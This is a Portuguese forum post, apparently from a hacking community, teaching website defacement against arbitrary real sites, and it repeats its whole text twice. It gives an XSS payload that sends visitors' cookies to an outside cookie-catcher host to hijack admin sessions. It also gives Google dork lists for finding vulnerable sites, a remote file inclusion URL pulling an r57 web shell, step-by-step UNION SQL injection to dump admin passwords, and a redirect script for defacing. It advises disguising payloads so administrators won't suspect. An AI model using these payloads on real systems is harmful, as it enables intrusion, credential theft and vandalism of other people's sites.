Tweet
E aê galera,hj vou mosrtar para vcs alguns métodos defacer mais utilizados:
XSS
O que é?
XSS é uma vulnerabilidade encontrada na maioria dos sites,com a injeção de códigos maliciosos
Como achar sites vulneráveis:
Primeiro pegaremos um site qualquer:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
E colocaremos esse código na url:
Ficará assim:
Se o site der algum erro em JavaScript é porque eh vulnerável a XSS.
E agora?
Agora o site deve ter algum lugar para vc postar um comentário ou coisa do tipo,como fóruns ou blogs.
Iremos postar o seguinte "Comentário":
Eu recomendo vc postar outra coisa antes de colocar o código,poste assim:
Gostei da Notícia ou Forum Muito Bom
Daí vc coloca o código,se não eles irão suspeitar
Feito isso atualize a página (F5)
Vá no Diretório que cv salvou o cookie.php:
O recipiente dos cookies pode ser:
Agr é so ir em:
E os Cookies estarão lá
Agora que temos os cookies,vamos editálo.
Vá para a página do Admin e delete todos os cookies.Agora vá para
E copie tudo de lá e cole no Bloco de Notas.
PS:O ; Separa os cookies dos outros,então copie o código antes de ;
Agora vá para o site e limpe a URL,e coloque isso:
Ou por Exemplo:
E agora visite o link,e faça com todos os cookies e atualize a página.
Pronto ! Estamos logados como Administrador.
PS:Esse tutorial não é meu,foi retirado desse site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Mas eu tive o trabalho de traduzir tudo
PHP injection
Oque é?
PHP injection,ou Remote File Inclusion(RFI) é quando vc inclui um arquivo remoto em uma pagina.
Iremos procurar uma Shell.
Vá ao Google (sim o google) e coloque
inurl:"r57.txt"
Clique no 1° (R57 Shell)
Agr Vamos achar os sites vul
Use estas Strings:
Óbvio que colocaremos no Google
Depois de acharmos o site vul,acrescentaremos a Shell na URL do site:
Essa é a URL da Shell
Colocaremos a URL da shell no final do site vuln:
Note que eu acrescentei ? no final da URL da shell.
Pronto,ja estamos dentro do site.
SQL Injection
SQL Injection Avançado
By:St4lker
Siga os passos Corretamente:
Ache um site vulnerável:
Para achar,entre em qualquer site,entre em qualquer aba com um script de "=" (sem aspas)
EX:
Clique em uma aba de Contato,notícias,sei lah,uq tiver.Quando clicar terá na url algo parecedido com isso:
noticias_s.php?id=21
Não vai ficar exatamente,mas deve ter o "=" e algum número
Depois coloque no final do número uma aspa ('),vai ficar assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...'
De um enter,se aparece um erro como esse: SQL ERROR:You have an error in your SQL syntax... é sinal que o site eh vul. a PHP Injection
Agr tire as aspas da URL:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agr iremos ver quantas colunas tem o site,então damos um espaço depois do id=21 e colocaremos: group by 1,2,3,4,5 (esses números sao as colunas,então aqui chutaremos os valores,poderia ser 1,2,3 ou 1,2,3,4,5,6,7)
Ficará assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1,2,3,4,5
Aperte Enter
Se aparecer SQL ERROR:Unknow column '4' (ou qualquer outro número) grop statement',significa que o site so vai ateh a coluna 3,ou seja,tem 3 colunas(e fosse Unknow Column 5,teria apenas 4 colunas)
Agr apague do 4 pra cima (ou o numero que deu erro pra cima)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1,2,3
Aperte Enter
Agr vc irá unir elas,para fazer isso digite o comando union all select 1,2,3,Ficara assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3
Aperte Enter
As colunas irão aparece no site
Agr vamos descobrir os tipos de colunas,mas chutando pq errando eh q se aprende
Iremos utilizar esse comando:
union all select 1,2,3 from ????
No lugar do ???? vc tera que chutar a tabela do administrador,aki estão alguns exemplos que vcs podem colocar:
admin
administrador
administradores
login
adm
adms
Claro,q se vc souber de mais pode colocar.Quando a tabela do administrador estiver errado (quando vc chutou errada) ira aparecer um erro,esse erro significa que aquela tabela nao existe,daí vc terá que tentar outro nome
Digamos que o nome seja admin,então ficara assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3 from admin
Agr a parte chata ¬_¬
Teremos que chutar os valores das tabelas 1,2,3
No número 1 por exemplo podemos colocar name,senha,login,email etc...
Se vc colocar no número 1 esses nomes e der um erro em todos,vá para a próxima tabela que eh a 2 ( a 2 geralmente eh o login ou email)
Por exemplo se eu colocar:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,login,3 from admin
E apertar Enter e nao der erro,aparece o login do adm,agr copie o login e cole no bloco de notas ou coisa do tipo pra vc nao esquecer ou perder
Agr tentaremos descobrir a senha,colocaremos algo similar a isso
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,login,senha from admin
Se nao der erro,aparece a senha,copie denovo para nao esquecer
Agr tentaremos achar o painel do adm para colocar o login e senha
Vc pode usar um programa como o Havij,ou achar sem nenhum programa.
Para fazer isso so colocamos a url do site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
E chutaremos onde está o painel.Aqui está alguns exemplos:
admin.php
admin
adm
administrador
administracao
Ficará assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (ou adm,administrador...)
Bem quando acharmos aparecerá para colocarmos o login e senha
Colocaremos e Pronto,estamos logado.
Agr iremos fazer o nosso deface
Para isso vc terá que ter uma página em html com seu deface,lembrando que ela deve estar hospedada.
Agr é so vc achar no site algum lugar para vc postar uma notícia ou coisa do tipo que so o admin pode
Quando acharmos vai ter algo parecido com isso:
Título
__________________________________________________ _________
Notícia
__________________________________________________ __________
__________________________________________________ __________
__________________________________________________ __________
Agora iremos usar um script para redirecionar o site automaticamente para a nossa página deface.
Usaremos isso em "Notícia"
<script>
location.href="http://nomedositedoseudeface" ;
</script>
PS:Onde esta nomedositedoseudeface (traduzindo,nome do site do seu deface) vc coloca o host onde vc hospedou,EX
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
É bem provável que termine com .html ou .htm
Agr é só postar a nossa "Notícia",entrar no site e pronto,a página vai ler o comando e vai automaticamente redirecionar para a nossa página deface.
PS:Caso não saiba criar sua página deface (html),veja no google,lá tem vários tutoriais.
Fui útil?
Agradeça
XSS
O que é?
XSS é uma vulnerabilidade encontrada na maioria dos sites,com a injeção de códigos maliciosos
Como achar sites vulneráveis:
Primeiro pegaremos um site qualquer:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
E colocaremos esse código na url:
Código:
"><script>alert(document.cookie)</script>
Código:
http://www.exemplo.com/index.php?id="><script>alert(document.cookie)</script>
E agora?
Agora o site deve ter algum lugar para vc postar um comentário ou coisa do tipo,como fóruns ou blogs.
Iremos postar o seguinte "Comentário":
Código:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Gostei da Notícia ou Forum Muito Bom
Daí vc coloca o código,se não eles irão suspeitar
Feito isso atualize a página (F5)
Vá no Diretório que cv salvou o cookie.php:
Código:
http://www.exemplo.com/cookie catcher.php
Código:
http://www.example.com/cookies.html
Código:
http://www.example.com/cookies.html
Agora que temos os cookies,vamos editálo.
Vá para a página do Admin e delete todos os cookies.Agora vá para
Código:
http://www.example.com/cookies.html
PS:O ; Separa os cookies dos outros,então copie o código antes de ;
Agora vá para o site e limpe a URL,e coloque isso:
Código:
Javascript:void(document.cookie="")
Código:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")
Pronto ! Estamos logados como Administrador.
PS:Esse tutorial não é meu,foi retirado desse site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Mas eu tive o trabalho de traduzir tudo
PHP injection
Oque é?
PHP injection,ou Remote File Inclusion(RFI) é quando vc inclui um arquivo remoto em uma pagina.
Iremos procurar uma Shell.
Vá ao Google (sim o google) e coloque
inurl:"r57.txt"
Clique no 1° (R57 Shell)
Agr Vamos achar os sites vul
Use estas Strings:
Código:
inurl:.br/index.php?loc= inurl:.br/index.php?option=com_content inurl:.br/members.php?id=all inurl:.com.*/index.php?option=com_comprofiler inurl:.com/index.php?option=com_remository inurl:.edu.*/modules.php?name=allmyguests inurl:.gov.br/index.php?arquivo= inurl:.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= inurl:.php?a= inurl:.php?abrir= inurl:.php?act= inurl:.php?action= inurl:.php?ad= inurl:.php?archive= inurl:.php?area= inurl:.php?article= inurl:.php?b= inurl:.php?back= inurl:.php?base= inurl:.php?basedir= inurl:.php?bbs= inurl:.php?board_no= inurl:.php?body= inurl:.php?c= inurl:.php?cal_dir= inurl:.php?cat= inurl:.php?category= inurl:.php?choice= inurl:.php?class= inurl:.php?club_id= inurl:.php?cod.tipo= inurl:.php?cod= inurl:.php?Comments= inurl:.php?conf= inurl:.php?configFile= inurl:.php?cont= inurl:.php?corpo= inurl:.php?cvsroot= inurl:.php?d= inurl:.php?da= inurl:.php?date= inurl:.php?debug=
Depois de acharmos o site vul,acrescentaremos a Shell na URL do site:
Essa é a URL da Shell
Código:
http://www.xfocus.net.ru/soft/r57.txt
Código:
www.exemplo.com/modify.php?dir_module=http://www.xfocus.net.ru/soft/r57.txt?
Pronto,ja estamos dentro do site.
SQL Injection
SQL Injection Avançado
By:St4lker
Siga os passos Corretamente:
Ache um site vulnerável:
Para achar,entre em qualquer site,entre em qualquer aba com um script de "=" (sem aspas)
EX:
Clique em uma aba de Contato,notícias,sei lah,uq tiver.Quando clicar terá na url algo parecedido com isso:
noticias_s.php?id=21
Não vai ficar exatamente,mas deve ter o "=" e algum número
Depois coloque no final do número uma aspa ('),vai ficar assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...'
De um enter,se aparece um erro como esse: SQL ERROR:You have an error in your SQL syntax... é sinal que o site eh vul. a PHP Injection
Agr tire as aspas da URL:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agr iremos ver quantas colunas tem o site,então damos um espaço depois do id=21 e colocaremos: group by 1,2,3,4,5 (esses números sao as colunas,então aqui chutaremos os valores,poderia ser 1,2,3 ou 1,2,3,4,5,6,7)
Ficará assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1,2,3,4,5
Aperte Enter
Se aparecer SQL ERROR:Unknow column '4' (ou qualquer outro número) grop statement',significa que o site so vai ateh a coluna 3,ou seja,tem 3 colunas(e fosse Unknow Column 5,teria apenas 4 colunas)
Agr apague do 4 pra cima (ou o numero que deu erro pra cima)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... group by 1,2,3
Aperte Enter
Agr vc irá unir elas,para fazer isso digite o comando union all select 1,2,3,Ficara assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3
Aperte Enter
As colunas irão aparece no site
Agr vamos descobrir os tipos de colunas,mas chutando pq errando eh q se aprende
Iremos utilizar esse comando:
union all select 1,2,3 from ????
No lugar do ???? vc tera que chutar a tabela do administrador,aki estão alguns exemplos que vcs podem colocar:
admin
administrador
administradores
login
adm
adms
Claro,q se vc souber de mais pode colocar.Quando a tabela do administrador estiver errado (quando vc chutou errada) ira aparecer um erro,esse erro significa que aquela tabela nao existe,daí vc terá que tentar outro nome
Digamos que o nome seja admin,então ficara assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3 from admin
Agr a parte chata ¬_¬
Teremos que chutar os valores das tabelas 1,2,3
No número 1 por exemplo podemos colocar name,senha,login,email etc...
Se vc colocar no número 1 esses nomes e der um erro em todos,vá para a próxima tabela que eh a 2 ( a 2 geralmente eh o login ou email)
Por exemplo se eu colocar:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,login,3 from admin
E apertar Enter e nao der erro,aparece o login do adm,agr copie o login e cole no bloco de notas ou coisa do tipo pra vc nao esquecer ou perder
Agr tentaremos descobrir a senha,colocaremos algo similar a isso
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,login,senha from admin
Se nao der erro,aparece a senha,copie denovo para nao esquecer
Agr tentaremos achar o painel do adm para colocar o login e senha
Vc pode usar um programa como o Havij,ou achar sem nenhum programa.
Para fazer isso so colocamos a url do site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
E chutaremos onde está o painel.Aqui está alguns exemplos:
admin.php
admin
adm
administrador
administracao
Ficará assim
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (ou adm,administrador...)
Bem quando acharmos aparecerá para colocarmos o login e senha
Colocaremos e Pronto,estamos logado.
Agr iremos fazer o nosso deface
Para isso vc terá que ter uma página em html com seu deface,lembrando que ela deve estar hospedada.
Agr é so vc achar no site algum lugar para vc postar uma notícia ou coisa do tipo que so o admin pode
Quando acharmos vai ter algo parecido com isso:
Título
__________________________________________________ _________
Notícia
__________________________________________________ __________
__________________________________________________ __________
__________________________________________________ __________
Agora iremos usar um script para redirecionar o site automaticamente para a nossa página deface.
Usaremos isso em "Notícia"
<script>
location.href="http://nomedositedoseudeface" ;
</script>
PS:Onde esta nomedositedoseudeface (traduzindo,nome do site do seu deface) vc coloca o host onde vc hospedou,EX
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
É bem provável que termine com .html ou .htm
Agr é só postar a nossa "Notícia",entrar no site e pronto,a página vai ler o comando e vai automaticamente redirecionar para a nossa página deface.
PS:Caso não saiba criar sua página deface (html),veja no google,lá tem vários tutoriais.
Fui útil?
Agradeça
Comment